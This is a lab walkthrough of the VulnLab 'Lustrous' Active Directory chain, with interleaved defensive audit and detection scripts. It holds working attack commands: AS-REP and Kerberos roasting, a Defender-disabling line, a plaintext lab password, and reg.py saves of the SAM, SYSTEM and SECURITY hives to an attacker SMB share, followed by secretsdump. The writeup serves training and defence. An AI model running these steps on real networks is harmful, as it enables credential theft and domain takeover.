This is a writeup of the chain Lustrous from VulnLab. It's a medium-difficulty Windows chain featuring ASREPRoasting, Kerberoasting, PowerShell credential-file abuse, and remote exploitation of SeBackupPrivilege.
🔍 Enumeration
An initial nmap scan of the hosts gave the following results:
```
nmap -sV -sC -T4 -Pn 10.10.159.53-54
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-12 19:13 EST
Stats: 0:00:30 elapsed; 0 hosts completed (2 up), 2 undergoing Script Scan
NSE Timing: About 98.22% done; ETC: 19:13 (0:00:00 remaining)
Nmap scan report for 10.10.159.53
Host is up (0.097s latency).
Not shown: 985 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_12-26-21  11:50AM       <DIR>          transfer
| ftp-syst:
|_  SYST: Windows_NT
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-13 00:13:14Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: lustrous.vl0., Site: Default-First-Site-Name)
443/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
| ssl-cert: Subject: commonName=LusDC.lustrous.vl
| Subject Alternative Name: DNS:LusDC.lustrous.vl
| Not valid before: 2021-12-26T09:46:02
|_Not valid after:  2022-12-26T00:00:00
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: lustrous.vl0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-12-13T00:14:04+00:00; -10s from scanner time.
| rdp-ntlm-info:
|   Target_Name: LUSTROUS
|   NetBIOS_Domain_Name: LUSTROUS
|   NetBIOS_Computer_Name: LUSDC
|   DNS_Domain_Name: lustrous.vl
|   DNS_Computer_Name: LusDC.lustrous.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-12-13T00:13:23+00:00
| ssl-cert: Subject: commonName=LusDC.lustrous.vl
| Not valid before: 2024-12-12T00:10:11
|_Not valid after:  2025-06-13T00:10:11
Service Info: Host: LUSDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Nmap scan report for 10.10.159.54
Host is up (0.100s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=LusMS.lustrous.vl
| Not valid before: 2024-12-12T00:10:12
|_Not valid after:  2025-06-13T00:10:12
|_ssl-date: 2024-12-13T00:14:04+00:00; -10s from scanner time.
| rdp-ntlm-info:
|   Target_Name: LUSTROUS
|   NetBIOS_Domain_Name: LUSTROUS
|   NetBIOS_Computer_Name: LUSMS
|   DNS_Domain_Name: lustrous.vl
|   DNS_Computer_Name: LusMS.lustrous.vl
|   DNS_Tree_Name: lustrous.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-12-13T00:13:24+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```
```
❯ ftp LusDC.lustrous.vl
Connected to LusDC.lustrous.vl.
220 Microsoft FTP Service
Name (LusDC.lustrous.vl:lfgberg): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||50101|)
125 Data connection already open; Transfer starting.
12-26-21  11:50AM       <DIR>          transfer
226 Transfer complete.
ftp> cd transfer
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50103|)
125 Data connection already open; Transfer starting.
12-26-21  11:51AM       <DIR>          ben.cox
12-26-21  11:49AM       <DIR>          rachel.parker
12-26-21  11:49AM       <DIR>          tony.ward
12-26-21  11:50AM       <DIR>          wayne.taylor
226 Transfer complete.
```
There's a transfer folder whose subdirectories give us a list of usernames:

```
ben.cox
rachel.parker
tony.ward
wayne.taylor
```
Looking inside the user folders, there's a users.csv file we can pull from transfer/ben.cox:

```
ftp> cd ben.cox
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50105|)
125 Data connection already open; Transfer starting.
12-26-21  11:51AM                 2944 users.csv
226 Transfer complete.
ftp> get users.csv
local: users.csv remote: users.csv
229 Entering Extended Passive Mode (|||50107|)
125 Data connection already open; Transfer starting.
100% |***********************************************************|  2944       28.47 KiB/s    00:00 ETA
226 Transfer complete.
2944 bytes received in 00:00 (28.40 KiB/s)
```
This wasn't super interesting, just information on groups.

I tried to check out the website on LusDC and SMB on both hosts, to no avail. The website gave me a 401 Unauthorized IIS page; we can probably come back to this with credentials.
🔥 Roasting
Since we have a list of users, we can try ASREPRoasting to get a user.

```
/home/lfgberg/.local/bin/GetNPUsers.py:165: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
$krb5asrep$23$ben.cox@LUSTROUS.VL:[SNIPPED]
[-] User rachel.parker doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User tony.ward doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User wayne.taylor doesn't have UF_DONT_REQUIRE_PREAUTH set
```
Tossing that into hashcat, we're able to crack the password for ben.cox.

```
hashcat -a 0 -m 18200 asrep.hash [wordlist]
```
Now that we have a user, I decided to try Kerberoasting to see if there are any other accounts we can pop.

```
❯ GetUserSPNs.py -request -dc-ip [IP] lustrous.vl/ben.cox -outputfile kerberoast.hash
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
```
This got us hashes for svc_web and svc_db, which we can feed into hashcat.

```
hashcat -a 0 -m 13100 ./kerberoast.hash [wordlist]
```

This popped the password for svc_web; svc_db didn't crack.
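Both roasting steps above only work because of two account attributes that a defender can audit directly: the UF_DONT_REQUIRE_PREAUTH bit in userAccountControl (what GetNPUsers.py keys on) and a servicePrincipalName on a user account (what GetUserSPNs.py keys on). The script below is an added example, not part of the original writeup; the user records are constructed to mirror the roles in the post (the svc_db SPN, adminCount and flag values are assumptions), and in a real audit they would come from an LDAP query for sAMAccountName, userAccountControl, servicePrincipalName and adminCount.

```python
"""Audit which accounts are exposed to AS-REP roasting or Kerberoasting.

Added example (not from the original writeup). Records are constructed.
"""
from dataclasses import dataclass, field

# userAccountControl bit flags as documented for the AD schema.
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000   # the bit GetNPUsers.py looks for


@dataclass
class AdUser:
    sam: str
    uac: int
    spns: list = field(default_factory=list)
    admin_count: int = 0


def is_asrep_roastable(u: AdUser) -> bool:
    """Pre-auth disabled on an enabled account: anyone can request an AS-REP
    for it and crack the encrypted part offline, as happened to ben.cox."""
    return bool(u.uac & UF_DONT_REQUIRE_PREAUTH) and not (u.uac & UF_ACCOUNTDISABLE)


def is_kerberoastable(u: AdUser) -> bool:
    """Enabled user account with an SPN: any domain user can request a TGS for
    it encrypted with the account's password-derived key. krbtgt is skipped
    because its kadmin/changepw SPN is not a roastable service."""
    if u.sam.lower() == "krbtgt":
        return False
    return bool(u.spns) and not (u.uac & UF_ACCOUNTDISABLE)


def audit(users):
    """Return {sam: (severity, [reasons])} for every exposed account."""
    findings = {}
    for u in users:
        reasons = []
        if is_asrep_roastable(u):
            reasons.append("DONT_REQUIRE_PREAUTH set")
        if is_kerberoastable(u):
            reasons.append("SPN(s): " + ", ".join(u.spns))
        if not reasons:
            continue
        # A password that never expires means one successful crack lasts forever.
        if u.uac & UF_DONT_EXPIRE_PASSWD:
            reasons.append("password never expires")
        severity = "high" if u.admin_count else "medium"
        findings[u.sam] = (severity, reasons)
    return findings


# Constructed records; no LDAP data from the lab is reproduced here.
SAMPLE_USERS = [
    AdUser("ben.cox", UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH),
    AdUser("rachel.parker", UF_NORMAL_ACCOUNT),
    AdUser("svc_web", UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD, ["HTTP/LusDC.lustrous.vl"]),
    AdUser("svc_db", UF_NORMAL_ACCOUNT, ["MSSQLSvc/lusdc.lustrous.vl:1433"], admin_count=1),
    # Disabled accounts cannot be roasted even with the risky attributes set.
    AdUser("old.svc", UF_NORMAL_ACCOUNT | UF_ACCOUNTDISABLE | UF_DONT_REQUIRE_PREAUTH, ["HOST/retired"]),
    AdUser("krbtgt", UF_NORMAL_ACCOUNT | UF_ACCOUNTDISABLE, ["kadmin/changepw"]),
]

if __name__ == "__main__":
    for sam, (sev, why) in audit(SAMPLE_USERS).items():
        print(f"[{sev}] {sam}: {'; '.join(why)}")
```

Anything the script reports is exactly what the two Impacket scripts would have returned tickets for; the fix is to clear the pre-auth flag and move SPN-bearing accounts to group managed service accounts or long random passwords.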
🧔 Ben Cox
Now, with our two users ben.cox and svc_web, I decided to check out WinRM and SMB on each machine. There wasn't anything interesting SMB-wise, but ben.cox is able to WinRM into LusMS.
Before poking at LusMS, I ran bloodhound as ben.cox.
```
❯ bloodhound-python -d lustrous.vl -u ben.cox -p '[PASSWORD]' -ns [DCIP] -c all --zip
INFO: Found AD domain: lustrous.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: lusdc.lustrous.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: lusdc.lustrous.vl
INFO: Found 28 users
INFO: Found 59 groups
INFO: Found 2 gpos
INFO: Found 6 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: LusMS.lustrous.vl
INFO: Querying computer: LusDC.lustrous.vl
WARNING: Could not resolve: LusMS.lustrous.vl: The resolution lifetime expired after 3.105 seconds: Server Do53:10.10.159.53@53 answered The DNS operation timed out.
INFO: Done in 00M 14S
INFO: Compressing output into 20241212192826_bloodhound.zip
```
Ben’s a member of the IT group, but that doesn’t seem to get us anything cool other than maybe the WinRM into LusMS.
The svc_web account is used for the http service on LusDC, which could come in handy for the website later.
As Ben I WinRM’d into LusMS, and found an admin.xml file on his Desktop.
```
❯ evil-winrm -i 10.10.159.54 -u 'ben.cox' -p 'Trinity1'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\ben.cox\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> ls


    Directory: C:\Users\ben.cox\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        12/26/2021  10:30 AM           1652 admin.xml
```
This file looks to be a PowerShell Credential File containing credentials for the local administrator on this machine. We can import that as a Credential Object, and dump the password.
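The reason a file like admin.xml is recoverable by the user who finds it is worth seeing concretely: the PSCredential is serialised as CLIXML, and the SecureString inside it is a DPAPI blob keyed to the Windows user who exported it, so it decrypts in that user's context and in no other. The following script is an added example, not from the original writeup: it inspects such a file offline without decrypting anything, which is what a defender would run when hunting for stored credentials on file shares and desktops. The XML is constructed to match the layout Export-Clixml produces; the username and the hex blob (a real DPAPI header followed by filler) are assumptions, not the contents of the lab's admin.xml.

```python
"""Inspect a PowerShell credential file (Export-Clixml of a PSCredential)
without decrypting it. Added example; the sample XML is constructed."""
import xml.etree.ElementTree as ET

PS_NS = "{http://schemas.microsoft.com/powershell/2004/04}"
# Every DPAPI blob starts with version 1 followed by the DPAPI provider GUID
# df9d8cd0-1501-11d1-8c7a-00c04fc297eb, stored little-endian.
DPAPI_HEADER = bytes.fromhex("01000000d08c9ddf0115d1118c7a00c04fc297eb")

# Constructed sample: real header, filler body (would not decrypt anywhere).
SAMPLE_CLIXML = """<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">LUSMS\\Administrator</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb0000000000000000000000000000000000000000</SS>
    </Props>
  </Obj>
</Objs>"""


def inspect_credential_file(xml_text: str) -> dict:
    """Return who the stored credential is for and how its secret is protected."""
    root = ET.fromstring(xml_text)
    for obj in root.iter(PS_NS + "Obj"):
        type_names = [t.text for t in obj.iter(PS_NS + "T")]
        if "System.Management.Automation.PSCredential" not in type_names:
            continue
        props = obj.find(PS_NS + "Props")
        user = props.find(f"{PS_NS}S[@N='UserName']")
        secret = props.find(f"{PS_NS}SS[@N='Password']")
        if user is None or secret is None:
            raise ValueError("PSCredential object is missing UserName or Password")
        blob = bytes.fromhex(secret.text.strip())
        # A DPAPI header means the blob is bound to the exporting user's master
        # key; anything else was protected with an explicit -Key and is only as
        # secret as wherever that key is stored.
        protection = "dpapi-user" if blob.startswith(DPAPI_HEADER) else "other"
        return {"username": user.text, "protection": protection, "blob_len": len(blob)}
    raise ValueError("no PSCredential object in file")


if __name__ == "__main__":
    print(inspect_credential_file(SAMPLE_CLIXML))
```

Run over a directory of *.xml files, this tells you which accounts have credentials cached on disk and in whose profile they sit, without touching DPAPI. The defensive takeaway matches the writeup: a credential exported by ben.cox is readable by anyone who can run code as ben.cox, so WinRM access to the box is effectively access to the local admin password.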
Next I WinRM’d in as local admin on LusMS with the credentials we found, grabbed the flag, and popped a sliver beacon.
🌐 Back to Web
I wasn't able to find anything on disk, from Mimikatz or any other kind of credential hunting, that would help pivot back to LusDC. But RDP is open on this machine, and viewing the website on LusDC through RDP prompts for a login page.
Logging in as ben.cox, it looks to be a notetaking site. It says it uses single sign on from a company machine.
Checking out the actual notes, there’s a password reminder, and a note that this app uses “Kerberos Authentication on IIS”.
Since this is using Kerberos Authentication, we should be able to mint a silver ticket to impersonate a given user against this site to view their password (assuming the hint shows for all users).
I chose tony.ward as my target since he’s in the Backup Admins group, and presumably has SeBackupPrivilege.
I performed all the following actions as local admin on LusMS via RDP; trying this remotely via evil-winrm doesn't work since it already uses up a Kerberos hop.

First I turned off Defender and dropped mimikatz to disk.

```powershell
Set-MpPreference -DisableRealtimeMonitoring $true
```
Next, we can mint and pass a silver ticket for use on the website.
The domain SID I pulled from BloodHound, the user ID comes from Tony's SID, and the hash of svc_web can be used for RC4.
Now, running klist we can verify that the ticket was successfully created and passed.
Lastly, with iwr we can use the ticket to get Tony's password.

```powershell
# -UseDefaultCredentials tells IWR to use the ticket we minted
(iwr -Uri "LusDC.lustrous.vl/internal" -UseDefaultCredentials -UseBasicParsing).Content
```
Se🔙🆙Privilege
I tried WinRM and RDP, but Tony can't get a session, so we'll need to exploit SeBackupPrivilege remotely.

This can be done with Impacket's reg.py to save registry hives to a remote SMB share. Initially I tried saving the SAM, SYSTEM, and SECURITY hives in one go, but I experienced frequent timeouts. Instead I pivoted to saving them individually, which worked fine.

```
reg.py "lustrous.vl"/"tony.ward":"[PASS]"@"[DC IP]" save -keyName 'HKLM\SAM' -o '\\[ATTACKER IP]\erm'
reg.py "lustrous.vl"/"tony.ward":"[PASS]"@"[DC IP]" save -keyName 'HKLM\SYSTEM' -o '\\[ATTACKER IP]\erm'
reg.py "lustrous.vl"/"tony.ward":"[PASS]"@"[DC IP]" save -keyName 'HKLM\SECURITY' -o '\\[ATTACKER IP]\erm'
```
Then I used secretsdump.py to dump credentials.

```
secretsdump.py -sam ./SAM.save -system ./SYSTEM.save -security ./SECURITY.save local
```
This got us credentials for the local admin, and the machine account for LusDC. We can use the machine account to run secretsdump.py to dump domain credentials from the DC.
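From the defender's side, the remote hive saves above leave a usable trail: each registry key opened with backup semantics is audited as Security event 4674 ("An operation was attempted on a privileged object") naming SeBackupPrivilege, and the writeup's workaround of saving the three hives one at a time means a detection has to aggregate separate events per user rather than look for a single dump. The script below is an added example, not from the original writeup. The event records are constructed, and the field names (EventID, SubjectUserName, SubjectLogonId, PrivilegeList, ObjectType, ObjectName, plus TargetLogonId, LogonType and IpAddress on the 4624 logon used for correlation) are assumed to be what a SIEM exposes for these events; the allow-listed service account and the client address are also assumptions.

```python
"""Flag registry-hive reads that rely on SeBackupPrivilege and spot a
complete SAM+SYSTEM+SECURITY set per user. Added example; events constructed."""

SENSITIVE_HIVES = {
    "SAM": "\\REGISTRY\\MACHINE\\SAM",
    "SECURITY": "\\REGISTRY\\MACHINE\\SECURITY",
    "SYSTEM": "\\REGISTRY\\MACHINE\\SYSTEM",
}
# Accounts expected to exercise backup privileges (constructed allow-list).
EXPECTED_BACKUP_ACCOUNTS = {"svc_backup"}


def _hive_of(object_name: str):
    """Map a kernel registry path to one of the credential-bearing hives."""
    name = object_name.upper()
    for hive, prefix in SENSITIVE_HIVES.items():
        if name == prefix or name.startswith(prefix + "\\"):
            return hive
    return None


def detect_hive_saves(events):
    """Return one alert per 4674 event that reads a sensitive hive via
    SeBackupPrivilege from an account not expected to do so."""
    # 4674 carries no source address; borrow it from the network logon (type 3)
    # that created the same logon session, so the alert says where it came from.
    remote_logons = {
        e["TargetLogonId"]: e.get("IpAddress", "?")
        for e in events
        if e.get("EventID") == 4624 and e.get("LogonType") == 3
    }
    alerts = []
    for e in events:
        if e.get("EventID") != 4674:
            continue
        if "SeBackupPrivilege" not in e.get("PrivilegeList", ""):
            continue
        if e.get("ObjectType") != "Key":   # file backups by admins are routine
            continue
        hive = _hive_of(e.get("ObjectName", ""))
        if hive is None:                   # SOFTWARE etc. hold no secrets here
            continue
        user = e.get("SubjectUserName", "")
        if user.lower() in EXPECTED_BACKUP_ACCOUNTS:
            continue
        alerts.append({
            "user": user,
            "hive": hive,
            "source": remote_logons.get(e.get("SubjectLogonId"), "local/unknown"),
        })
    return alerts


def dump_sets(alerts):
    """Aggregate alerts per user; 'complete' means all three hives were read,
    which is what secretsdump needs offline."""
    per_user = {}
    for a in alerts:
        per_user.setdefault(a["user"], set()).add(a["hive"])
    return {u: {"hives": sorted(h), "complete": h == set(SENSITIVE_HIVES)}
            for u, h in per_user.items()}


# Constructed sample events (logon ids and the 10.10.14.2 address are made up).
SAMPLE_EVENTS = [
    {"EventID": 4624, "TargetUserName": "tony.ward", "TargetLogonId": "0x3a5f1",
     "LogonType": 3, "IpAddress": "10.10.14.2"},
    {"EventID": 4674, "SubjectUserName": "tony.ward", "SubjectLogonId": "0x3a5f1",
     "PrivilegeList": "SeBackupPrivilege", "ObjectType": "Key", "ObjectName": "\\REGISTRY\\MACHINE\\SAM"},
    {"EventID": 4674, "SubjectUserName": "tony.ward", "SubjectLogonId": "0x3a5f1",
     "PrivilegeList": "SeBackupPrivilege", "ObjectType": "Key", "ObjectName": "\\REGISTRY\\MACHINE\\SYSTEM"},
    {"EventID": 4674, "SubjectUserName": "tony.ward", "SubjectLogonId": "0x3a5f1",
     "PrivilegeList": "SeBackupPrivilege", "ObjectType": "Key", "ObjectName": "\\REGISTRY\\MACHINE\\SECURITY"},
    {"EventID": 4674, "SubjectUserName": "svc_backup", "SubjectLogonId": "0x1b2c",
     "PrivilegeList": "SeBackupPrivilege", "ObjectType": "Key", "ObjectName": "\\REGISTRY\\MACHINE\\SYSTEM"},
    {"EventID": 4674, "SubjectUserName": "admin.user", "SubjectLogonId": "0x2c3d",
     "PrivilegeList": "SeBackupPrivilege", "ObjectType": "File", "ObjectName": "C:\\Shares\\report.docx"},
    {"EventID": 4674, "SubjectUserName": "admin.user", "SubjectLogonId": "0x2c3d",
     "PrivilegeList": "SeRestorePrivilege", "ObjectType": "Key", "ObjectName": "\\REGISTRY\\MACHINE\\SOFTWARE\\Vendor"},
]

if __name__ == "__main__":
    hits = detect_hive_saves(SAMPLE_EVENTS)
    for a in hits:
        print(f"{a['user']} read {a['hive']} from {a['source']}")
    print(dump_sets(hits))
```

The event only exists if "Audit Sensitive Privilege Use" is enabled on the DC, and the detection is only meaningful if Backup Operators membership is kept to accounts you actually expect in the allow-list; in this chain, tony.ward holding the privilege with no interactive access was the whole foothold.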